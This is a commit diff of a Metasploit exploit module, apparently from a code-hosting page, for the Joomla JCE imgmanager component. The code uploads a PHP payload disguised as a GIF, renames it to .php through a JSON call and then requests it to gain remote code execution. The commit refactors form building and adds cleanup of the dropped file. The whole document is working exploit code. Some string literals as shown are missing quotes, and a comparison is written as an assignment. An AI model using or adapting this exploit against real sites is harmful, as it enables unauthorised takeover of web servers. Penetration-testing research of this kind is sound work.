@@ -11,6 +11,7 @@ class Metasploit3 < Msf::Exploit::Remote
1111 Rank = ExcellentRanking
1212
1313 include Msf ::Exploit ::Remote ::HttpClient
14+ include Msf ::Exploit ::FileDropper
1415
1516 def initialize ( info = { } )
1617 super ( update_info ( info ,
@@ -56,17 +57,16 @@ def initialize(info = {})
5657
5758 def get_version
5859 # check imgmanager version
59- @uri_base = normalize_uri ( datastore [ 'URI' ] , 'index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager' )
60- uri = ''
61- uri << @uri_base
60+ @uri_base = normalize_uri ( datastore [ 'URI' ] ) + 'index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager'
61+ uri = @uri_base
6262 print_status ( "Checking component version to #{ datastore [ 'RHOST' ] } #{ datastore [ 'RPORT' ] } )
6363 res = send_request_cgi (
6464 {
6565 'uri' => uri ,
6666 'method' => 'GET' ,
67- 'version' => '1.1' ,
67+ 'version' => '1.1'
6868
69- } , 25 )
69+ } )
7070
7171 if ( res and res . code == 200 )
7272 res . body . match ( %r{^\s +?<title>Image\s Manager\s :\s ?(.*)<} )
@@ -95,39 +95,28 @@ def upload_gif
9595 @script_name = rand_text_alpha_lower ( 6 )
9696 boundary = '-' * 27 + rand_text_numeric ( 11 )
9797
98- uri = ''
99- uri << @uri_base
98+ uri = @uri_base
10099 uri << '&method=form'
101100
102101 # POST data
103- data = "--#{ boundary } \r \n "
104- data << "Content-Disposition: form-data; name=\" upload-dir\" \r \n \r \n "
105- data << "/\r \n "
106- data << "--#{ boundary } \r \n "
107- data << "Content-Disposition: form-data; name=\" Filedata\" ; filename=\" \" \r \n "
108- data << "Content-Type: application/octet-stream\r \n \r \n "
109- data << "\r \n "
110- data << "--#{ boundary } \r \n "
111- data << "Content-Disposition: form-data; name=\" upload-overwrite\" \r \n \r \n "
112- data << "0\r \n "
113- data << "--#{ boundary } \r \n "
114- data << "Content-Disposition: form-data; name=\" Filedata\" ; filename=\" #{ @script_name } \" \r \n "
115- data << "Content-Type: image/gif\r \n \r \n "
116- data << "#{ cmd_php } \r \n "
117- data << "--#{ boundary } \r \n "
118- data << "Content-Disposition: form-data; name=\" upload-name\" \r \n \r \n "
119- data << "#{ @script_name } \r \n "
120- data << "--#{ boundary } \r \n "
121- data << "Content-Disposition: form-data; name=\" action\" \r \n \r \n "
122- data << "upload\r \n "
123- data << "--#{ boundary } \r \n \r \n "
102+ post_data = Rex ::MIME ::Message . new
103+ post_data . bound = boundary
104+ post_data . add_part ( "/" , nil , nil , "form-data; name=\" upload-dir\" " )
105+ post_data . add_part ( "" , "application/octet-stream" , nil , "form-data; name=\" Filedata\" ; filename=\" \" " )
106+ post_data . add_part ( "0" , nil , nil , "form-data; name=\" upload-overwrite\" " )
107+ post_data . add_part ( "#{ cmd_php } , "image/gif" , nil , "form-data; name=\" Filedata\" ; filename=\" #{ @script_name } \" " )
108+ post_data . add_part ( "#{ @script_name } , nil , nil , "form-data; name=\" upload-name\" " )
109+ post_data . add_part ( "upload" , nil , nil , "form-data; name=\" action\" " )
110+
111+ data = post_data . to_s
112+
124113 res = send_request_cgi ( {
125114 'uri' => uri ,
126115 'method' => 'POST' ,
127116 'version' => '1.1' ,
128117 'data' => data ,
129- 'ctype' => ' multipart/form-data; boundary=' + boundary
130- } , 25 )
118+ 'ctype' => " multipart/form-data; boundary=#{ post_data . bound } "
119+ } )
131120
132121 if ( res and res . code = 200 )
133122 return :access_denied if ( res . body =~ /RESTRICTED/i )
@@ -143,8 +132,8 @@ def upload_gif
143132
144133 def renamed?
145134 # Rename the file from .gif to .php
146- uri = ''
147- uri << @uri_base
135+ # uri = ''
136+ uri = @uri_base
148137 uri << '&version=1576&cid=20'
149138
150139 data = "json={\" fn\" :\" folderRename\" ,\" args\" :[\" /#{ @script_name } \" ,\" #{ @script_name } \" ]}"
@@ -162,7 +151,7 @@ def renamed?
162151 {
163152 'X-Request' => 'JSON'
164153 }
165- } , 25 )
154+ } )
166155 if ( res and res . code == 200 )
167156 print_good ( "Renamed #{ @script_name } #{ @script_name } )
168157 return true
@@ -177,9 +166,15 @@ def call_payload
177166 print_status ( "Calling payload: #{ @script_name } )
178167 uri = normalize_uri ( datastore [ 'URI' ] )
179168 uri << directory + @script_name + ".php"
180- res = send_request_raw ( {
181- 'uri' => uri
182- } , 25 )
169+ res = send_request_cgi ( {
170+ 'uri' => uri ,
171+ 'method' => 'GET' ,
172+ 'version' => '1.1'
173+ } )
174+ end
175+
176+ def on_new_session
177+ # on_new_session will force stdapi to load (for Linux meterpreter)
183178 end
184179
185180 def exploit
@@ -188,6 +183,7 @@ def exploit
188183 if upload_gif == :success
189184 if renamed?
190185 call_payload
186+ register_files_for_cleanup ( @script_name )
191187 end
192188 end
193189
0 commit comments